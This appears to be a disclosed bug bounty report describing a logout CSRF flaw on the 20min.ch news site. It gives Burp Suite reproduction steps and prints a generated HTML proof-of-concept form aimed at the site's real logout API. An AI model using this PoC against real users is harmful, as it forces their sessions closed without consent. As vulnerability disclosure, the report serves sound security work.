Summary by DeadSniper
As this is informational finding for you so we can disclose it publicly
As this is informational finding for you so we can disclose it publicly
https://www.20min.ch
Web App
https://www.20min.ch/profile
I found CSRF while logging out from the account. While exploiting this poc by sending it to a user, any logged-in user can be logout from their session.
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. ... If the victim is an administrative account, CSRF can compromise the entire web application.
⚡ Login to user 1 Account
⚡ Then Logout and intercept the request in BurpSuite
⚡ Right Click >> Engagement Tools >> Generate CSRF POC
⚡ Copy the entire HTML code and save it
⚡ Now Run this CSRF Exploit where 2nd Account is logged in
⚡ User Logout ⚜(CSRF EXPLOIT!)⚜
Logout any victim into the attacker account, send the HTML made by the attacker, and then logout him from the Session.
POC Video Attached Below and also, the CODE THAT I USED IS GIVEN BELOW...
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://api.20min.ch/user/v1/logout">
<input type="hidden" name="redirect" value="https://www.20min.ch/" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>